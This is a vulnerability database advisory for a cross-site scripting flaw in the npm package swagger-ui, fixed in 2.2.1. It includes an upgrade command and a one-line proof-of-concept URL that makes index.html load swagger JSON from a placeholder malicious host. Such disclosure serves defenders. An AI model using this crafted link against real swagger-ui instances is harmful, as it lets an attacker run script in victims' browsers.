VDB
Sign up
CRITICAL

GHSA-7f59-x49p-v8mq

Cross-Site Scripting in swagger-ui

Quick fix

GHSA-7f59-x49p-v8mq — swagger-ui: upgrade to the fixed version with the command below.

npm install swagger-ui@2.2.1

Details

Affected versions of `swagger-ui` are vulnerable to cross-site scripting in both the `consumes` and `produces` parameters of the swagger JSON document for a given API.

Additionally, `swagger-ui` allows users to load arbitrary swagger JSON documents via the query string parameter `url`, allowing an attacker to exploit this attack against any user that the attacker can convince to visit a crafted link.

## Proof of Concept

``` http://<USER_HOSTNAME>/swagger-ui/index.html?url=http://<MALICIOUS_HOSTNAME>/malicious-swagger-file.json ````

## Recommendation

Update to version 2.2.1 or later.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/swagger-ui
Introduced in: 0Fixed in: 2.2.1
Fixnpm install swagger-ui@2.2.1

References